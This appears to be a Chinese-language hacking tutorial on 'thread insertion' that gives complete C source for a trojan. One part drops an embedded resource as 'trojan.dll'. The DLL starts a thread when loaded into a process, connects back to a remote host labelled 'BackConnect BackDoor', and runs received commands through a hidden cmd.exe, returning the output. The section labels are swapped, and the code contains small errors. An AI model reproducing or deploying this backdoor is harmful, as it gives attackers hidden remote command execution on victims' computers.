黑客编程教程（十六）线程插入技术

//  resource.h

#define RC_BINARYTYPE 256

#define ID_MAGICDEL_DLL 100

 

DLL文件:

 

#include <windows.h>

#include<stdio.h>

#include "resource.h"

 

void WriteResourceToFile(char const *filename)

{

 

HINSTANCE hInstance=GetModuleHandle(NULL);

    

    HRSRC hResInfo = FindResource(hInstance, MAKEINTRESOURCE(ID_MAGICDEL_DLL),

                                  MAKEINTRESOURCE(RC_BINARYTYPE));

    HGLOBAL hgRes = LoadResource(hInstance, hResInfo);

    void *pvRes = LockResource(hgRes);

    DWORD cbRes = SizeofResource(hInstance, hResInfo);

 

    

    HANDLE hFile = CreateFile(filename, GENERIC_WRITE, 0, 0, CREATE_ALWAYS,

                              FILE_ATTRIBUTE_NORMAL, 0);

    DWORD cbWritten;

    WriteFile(hFile, pvRes, cbRes, &cbWritten, 0);

    CloseHandle(hFile);

}

 

 

int main(void)

{

    WriteResourceToFile("trojan.dll");

return 0;

}

 

主程序:

 

#include<winsock2.h>

#include<stdio.h>

#pragma comment(lib,"ws2_32.lib")

#pragma comment(lib, "kernel32.lib")

int StartSocket(); //连接函数

BOOL APIENTRY DllMain( HANDLE hModule, 

                       DWORD  ul_reason_for_call, 

                       LPVOID lpReserved

)   //动态连接库的入口，相当于main()函数

{

switch(ul_reason_for_call)

    {

      case DLL_PROCESS_ATTACH: 

       {

           DWORD id;           CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)StartSocket,NULL,0,&id);

           break;

       }

      default:

  break;

    }

  return TRUE;

}

int StartSocket()

{

char *messages = "
======================== BackConnect BackDoor V0.1 ========================
========= Welcome to Http://www.hackerxfiles.net =========
"; 

WSADATA WSAData;

SOCKET sock;

SOCKADDR_IN addr_in;

char buf1[1024];   //作为socket接收数据的缓冲区

memset(buf1,0,1024);   //清空缓冲区

 if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)

   {

     printf("WSAStartup error.Error:d
",WSAGetLastError());

     return;

   }

 

   addr_in.sin_family=AF_INET;

   addr_in.sin_port=htons(80);  //反向连接的远端主机端口

   addr_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");  //远端IP

      if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)

   {

     printf("Socket failed.Error:d
",WSAGetLastError());

     return;

   }

   if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)     //连接客户主机

   {

     printf("Connect failed.Error:d",WSAGetLastError());

     return;

   }

      if (send(sock,messages,strlen(messages),0)==SOCKET_ERROR)  //发送欢迎信息

   {

        printf("Send failed.Error:d
",WSAGetLastError());

        return;

   }

   

char buffer[2048] = {0};//管道输出的数据

for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline))){

SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出

HANDLE hRead,hWrite;

sa.nLength = sizeof(SECURITY_ATTRIBUTES);

sa.lpSecurityDescriptor = NULL;

sa.bInheritHandle = TRUE;

if (!CreatePipe(&hRead,&hWrite,&sa,0)) 

{

  printf("Error On CreatePipe()");

     return;

} 

 

STARTUPINFO si;

PROCESS_INFORMATION pi; 

si.cb = sizeof(STARTUPINFO);

GetStartupInfo(&si); 

si.hStdError = hWrite;

si.hStdOutput = hWrite;

si.wShowWindow = SW_HIDE;

si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

 

GetSystemDirectory(cmdline,MAX_PATH+1);

strcat(cmdline,"\cmd.exe /c");

 

int   len=recv(sock,buf1,1024,NULL);

if(len==SOCKET_ERROR)exit(0); //如果客户端断开连接，则自动退出程序

if(len<=1){send(sock,"error
",sizeof("error
"),0);continue;}

 

strncat(cmdline,buf1,strlen(buf1)); //把命令参数复制到cmdline

if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) 

{

 send(sock,"Error command
",sizeof("Error command
"),0);

 continue;

}

  

CloseHandle(hWrite);

//循环读取管道中数据并发送，直到管道中没有数据为止

for(DWORD bytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL);memset(buffer,0,2048)){  

send(sock,buffer,strlen(buffer),0);

}

     }

return 0;

}